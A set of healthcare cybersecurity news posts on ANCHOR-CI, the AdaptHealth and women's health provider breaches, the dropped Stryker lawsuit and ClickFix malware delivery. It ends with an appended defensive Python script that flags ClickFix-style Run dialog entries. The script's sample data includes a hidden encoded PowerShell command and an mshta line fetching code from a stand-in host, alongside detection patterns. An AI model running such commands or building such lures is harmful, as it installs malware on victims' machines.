ANCHOR-CI Framework Strengthens Partnerships and Information Sharing to Secure Critical Infrastructure

The Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) has announced the formation of the Alliance of National Councils for Homeland Operational Resilience–Critical Infrastructure, or ANCHOR-CI for short. ANCHOR-CI will operate for two years initially but may be extended by the DHS Secretary under the authority provided by Section 871 of the Homeland Security Act.

ANCHOR-CI is the successor to the Critical Infrastructure Partnership Advisory Council (CIPAC), which enabled critical infrastructure entities to exchange sensitive information with the federal government about physical and cyber risks. CIPAC was established by the DHS in March 2006 and served as the framework for public collaboration on security for almost two decades, until it was eliminated by then-DHS Secretary Kristi Noem in March 2025. There has been no formal framework for government-industry coordination on critical infrastructure cybersecurity for more than a year, and without the legal protections provided by CIPAC or an equivalent framework, some critical infrastructure sectors stopped sharing cybersecurity data with the federal government.

ANCHOR-CI retains the legal protections of CIPAC and creates a new framework to strengthen information sharing and broaden partnerships across government and industry to better secure the nation’s critical infrastructure. “The new and innovative ANCHOR-CI framework will be a game changer in how the public and private sectors collaborate and share information,” said DHS Secretary Markwayne Mullin. “In a rapidly evolving threat environment, ANCHOR-CI will ensure we have the right people in the room working together to keep the critical infrastructure Americans rely on secure and resilient. This is just another example of the partnership needed to confront the threats of today and tomorrow.”

ANCHOR-CI allows the establishment of four council types: critical infrastructure sector councils, cross-sector councils, critical infrastructure industry councils, and regional coordinating councils, which will advise and provide strategic and actionable recommendations to ensure a coordinated national effort to strengthen critical infrastructure cybersecurity. The councils will recruit members from four groups: critical infrastructure owners, operators and their trade associations; federal, state, local, tribal and territorial government agencies; organizations with direct responsibility for cybersecurity and infrastructure resilience; and other private sector entities.

The new framework is more flexible than its predecessor, supports open and candid discussions of sensitive information, strengthens collaboration between the government and industry, and will ensure more critical infrastructure stakeholders participate. One key feature of CIPAC that has been dropped in ANCHOR-CI is liability protection for participants. This was an important feature that allowed executives to discuss incidents in group settings without antitrust or regulatory exposure.

Under the new framework, CISA will approve proposed council members and may appoint additional participants. Under CIPAC, private sector councils chose their own representatives. While some meetings can be opened to the public, sensitive discussions are shielded, as ANCHOR-CI is exempted from the Federal Advisory Committee Act.

Governance of the ANCHOR-CI councils will be managed by the DHS and CISA, and it will be housed by CISA, which will provide the necessary funding and administrative support. The HHS Office of Cybersecurity and Infrastructure Protection (CIP) will work closely with DHS and CISA to advance collaboration and ensure that the Healthcare and Public Health (HPH) sector priorities are elevated. The ANCHOR-CI councils will help strengthen partnerships within the HPH sector, as well as across interdependent critical infrastructure sectors, including water and communications.

The post ANCHOR-CI Framework Strengthens Partnerships and Information Sharing to Secure Critical Infrastructure appeared first on The HIPAA Journal.

AdaptHealth Reports Material Cybersecurity Incident and Theft of Patient Data

AdaptHealth, a publicly traded healthcare company that provides home medical equipment, diabetes supplies, and sleep therapy products, has informed the U.S. Securities and Exchange Commission (SEC) that it is investigating a material cybersecurity incident involving unauthorized access to patient data.

According to the company’s Form 8-K filing, a threat actor contacted the company on June 15, 2026, claiming to have obtained files containing patient data. AdaptHealth launched an investigation, engaged third-party cybersecurity experts, and notified law enforcement. AdaptHealth has determined that certain cloud-based business applications were accessed by the threat actor, including internal patient management systems and document storage platforms. Files containing patients’ personally identifiable information (PII) and protected health information were exfiltrated by the threat actor.

The investigation is ongoing; however, AdaptHealth has determined that the unauthorized access occurred after a third-party contractor responded to a social engineering attack, which allowed the contractor’s credentials to be obtained. The threat actor obtained a stored password file tied to insurance billing and access to external electronic health record portals.

The affected account has been disabled, credentials have been reset, and additional access controls have been implemented. The incident has not had an impact on its operations or patient services, and a review is ongoing to determine the extent of data theft. The types of data involved have yet to be determined, and the number of affected individuals is currently unknown. AdaptHealth said it does not collect patients’ Social Security numbers, and financial account information and payment card information are not stored in the compromised systems.

AdaptHealth said it considers this to be a material cybersecurity incident due to the nature and potential volume of data at risk. The financial impact of the incident is still being assessed, with the company potentially having to cover costs associated with forensics, breach notification, legal and regulatory responses, and any remediation measures. The company holds a cybersecurity insurance policy, which may cover certain losses associated with the incident.

While AdaptHealth has not named the threat actor behind the attack, this appears to have been a data theft and extortion attempt by the ShinyHunters threat group. ShinyHunters added AdaptHealth to its data leak site and has threatened to leak the stolen data if the ransom is not paid, giving the company a final warning to pay or face a data leak.


Delaware & Florida Women’s Health Centers Announce Data Breaches

Two women’s healthcare providers have announced data privacy incidents. Women’s Wellness of Southern Delaware recently learned about unauthorized retention of patient data by a former provider of aesthetic services, and Women’s Center for Radiology has identified a hacking incident.

Women’s Wellness of Southern Delaware

Women’s Wellness of Southern Delaware, a Lewes, DE-based provider of obstetrics, gynecology, and facial aesthetic services, has recently learned that a former provider who rendered aesthetic services for the practice retained the protected health information of patients after engagement with the practice had terminated. Women’s Wellness of Southern Delaware was made aware of the data retention on April 28, 2026. The provider retained patients’ contact information and other patient-related information and is believed to have contacted certain patients to offer similar services at a new practice.

The information retained relates to certain recipients of aesthetic services and clinical services patients. For the aesthetic services patients, the information included their name, birth date, gender, email address, physical address, phone number, allergies, medications, supplements, and information related to the services received, which may include photographs, intake records, aesthetics-related medical history, face maps, dates of services and purchases, and descriptions of services or items purchased. For the clinical services recipients, the impacted data included name, phone number, dates of purchases, and descriptions of the items/medications purchased. The former provider did not have access to electronic medical records.

Women’s Wellness of Southern Delaware said it is in communication with the former provider and is seeking to obtain assurances that the data is returned or destroyed, and steps have been taken to enhance its data privacy and security measures to prevent similar incidents in the future. The incident is not currently shown on the HHS’ Office for Civil Rights breach portal, so it is currently unclear how many individuals have been affected.

Women’s Center for Radiology

Women’s Center for Radiology, a provider of medical imaging services at three locations in Orlando, Florida, has identified unauthorized access to parts of its network containing patient data. The unauthorized access was identified on or around April 28, 2026, and the forensic investigation determined that an unauthorized third party gained access to a limited part of its computer network. Files containing patient information were viewed or downloaded by the unauthorized third party.

Assisted by third-party specialists, Women’s Center for Radiology determined that the exposed files contained patient information such as names, addresses, dates of birth, contact information, diagnosis or condition, lab results, treating physician, medical record number, health insurance information, and driver’s license numbers.

Women’s Center for Radiology has started notifying the affected individuals, who have been offered complimentary credit monitoring and identity theft protection services. Women’s Center for Radiology is reviewing its policies, procedures, and protocols related to data privacy and security. Regulators have been notified about the incident; however, the number of affected individuals has not yet been publicly disclosed.


Employees Drop Class Action Lawsuit Against Stryker Over Hamdala Cyberattack

A consolidated class action lawsuit against the medtech company Stryker over a March 2026 cyberattack has been voluntarily dismissed by the plaintiffs, shortly after Stryker filed a motion to dismiss the lawsuit, alleging a lack of standing.

The Iranian hacktivist group Hamdala targeted Stryker in response to the military action in Iran by the United States and Israel. The hackers breached certain Stryker systems, stole around 50 terabytes of data, and permanently erased 12 petabytes of data on around 200,000 company devices. The attack caused considerable disruption, taking systems out of action for weeks.

Eight current and former Stryker employees took legal action against the company alleging that their personal information was compromised in the attack. The lawsuits started to be filed within hours of Stryker announcing the cyberattack, before Stryker had completed its investigation. While a significant amount of data was stolen in the attack, Stryker said its forensic investigation found no evidence to suggest that any of the plaintiffs’ data was compromised.

Stryker searched for the plaintiffs’ personally identifiable information (PII) in the compromised files and found the business email addresses of two of the plaintiffs, but no PII. None of the plaintiffs received a notification from Stryker informing them that their PII was involved, but despite that, the plaintiffs took legal action against the company seeking to represent a class of individuals whose PII was compromised. On June 22, 2026, Stryker filed a motion to dismiss the class action litigation.

In its motion to dismiss, Stryker said the employees started filing lawsuits 48 hours after the cyberattack was announced on March 11, 2026, and that they speculated that their names, Social Security numbers, unspecified financial account information, unspecified health insurance information, and unspecified driver’s license information were compromised in the incident. The plaintiffs asserted claims for negligence, negligence per se, breach of implied contract, intrusion upon seclusion, unjust enrichment, breach of confidence, and declaratory judgment.

Stryker said the plaintiffs vaguely alleged that they had been injured as a result of the incident; however, those injuries were theoretical. Six of the plaintiffs alleged that their PII had been misused, speculating that it was due to the cyberattack on Stryker, but they failed to allege sufficient detail to link the misuse of their data to the Stryker cyberattack. Stryker determined that their PII had been exposed in numerous prior data breaches, including their Social Security numbers. Two of the plaintiffs had their PII exposed in at least 20 prior data breaches.

Stryker maintains that the incident did not involve devices or systems connected to its customers, although the attack did impact its electronic ordering system and other related systems used by its clients. The cyberattack has been reported to the U.S. Securities and Exchange Commission (SEC); however, the company has not issued breach notifications to the HHS’ Office for Civil Rights or state attorneys general at the time of publication.

The eight class action lawsuits filed by employees were consolidated into a single action – In re Stryker Corporation Cyberattack Litigation – in the U.S. District Court for the Western District of Michigan, Southern Division. The plaintiffs opted to voluntarily dismiss the consolidated lawsuit on June 29, 2026. U.S. District Court Judge Hala Jarbou has signed an order dismissing the employees’ claims without prejudice. Should Stryker determine that the plaintiffs’ PII was compromised in the incident, the lawsuits can be refiled.


ClickFix Social Engineering Technique is the Leading Method for Malware Delivery

The ClickFix social engineering technique is the leading method of malware delivery, according to an analysis by researchers at ReliaQuest. The researchers analyzed cyberattacks between March 1 and March 31, 2026, and found that attackers were most commonly exploiting trusted identities, devices, and tools in their attacks. This approach allows the attackers to hide their activities, which resemble normal user behavior, and bypass traditional perimeter and file scanning defenses.

The leading technique was ClickFix, which involves tricking users into pasting the attacker’s commands and scripts into trusted system dialogs, such as the Windows Run dialog. Pressing the Windows Key + R launches the Run dialog, and the user is convinced to paste the supplied code into the dialog and execute it, having been tricked into thinking that the command will resolve an IT issue.

For instance, a user visits a website that triggers a pop-up, warning them that their browser contains a vulnerability or an image failed to load. They are told to click a button, which copies code, and then paste that command into the Run dialog and press Enter, thus executing the command. Other methods involve generating a fake CAPTCHA page, informing the user that they need to complete the test to verify they are human by pasting and running the command. That command launches PowerShell code that delivers the malware payload.

ReliaQuest researchers report that this technique is commonly used to deliver the NetSupport RAT, a remote access Trojan, and Deepload fileless malware, although they observed this technique being used to deliver a range of malware variants. This approach has also been used against macOS users for the first time, delivering Atomic Stealer (AMOS), which can steal browser credentials, session cookies, cryptocurrency wallets, and keychain data.

ReliaQuest recommends that companies add this method of attack to their security awareness training programs and warn employees not to paste commands into dialog boxes such as Run, Terminal, or Script Editor. It also recommends that they consider restricting the use of the Run feature, restrict users from executing executable files, and use web filters to block pop-ups and prevent access to malicious websites.
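For defenders, an added example (not from ReliaQuest or the original article) of triaging a user's Run dialog history for the paste-and-run pattern described above. It assumes the history has been exported from the per-user `RunMRU` registry key, where Windows records Run dialog entries; the sample values, the rule set, and the `min_hits` threshold are constructed for illustration.

```python
import re

# Constructed sample of Run-dialog history values, shaped like an export of
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
# Every command and host below is made up for this example.
SAMPLE_RUNMRU = {
    "MRUList": "edcba",  # newest entry first
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": "powershell -NoProfile -WindowStyle Hidden -EncodedCommand "
         "<PLACEHOLDER> # I am not a robot\\1",
    "d": "mshta https://captcha.example/check.hta\\1",
    "e": "cmd\\1",
}

# Illustrative heuristics (assumptions of this example, not vendor signatures).
RULES = [
    ("script-host", re.compile(r"\b(powershell|pwsh|mshta|wscript|cscript|cmd)(\.exe)?\b", re.I)),
    ("remote-fetch", re.compile(r"https?://|\b(iwr|irm|curl|invoke-webrequest)\b", re.I)),
    ("hidden-or-encoded", re.compile(r"-w(in(dowstyle)?)?\s+h(idden)?\b|-e(nc(odedcommand)?)?\s", re.I)),
    ("captcha-lure", re.compile(r"not a robot|captcha|verif(y|ication)", re.I)),
]

def parse_runmru(values):
    """Return commands newest-first, dropping the trailing '\\1' marker."""
    commands = []
    for name in values.get("MRUList", ""):
        data = values.get(name)
        if data is None:  # MRUList can reference a value that was deleted
            continue
        commands.append(data[:-2] if data.endswith("\\1") else data)
    return commands

def triage(values, min_hits=2):
    """Flag entries that start a script host and match at least one more rule."""
    findings = []
    for command in parse_runmru(values):
        hits = [label for label, rx in RULES if rx.search(command)]
        if "script-host" in hits and len(hits) >= min_hits:
            findings.append((command, hits))
    return findings

if __name__ == "__main__":
    for command, hits in triage(SAMPLE_RUNMRU):
        print(", ".join(hits), "->", command)
```

An empty result does not clear a host: the key only records commands launched through the Run dialog and can be cleared by the user, so treat hits as leads for process and network telemetry review.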
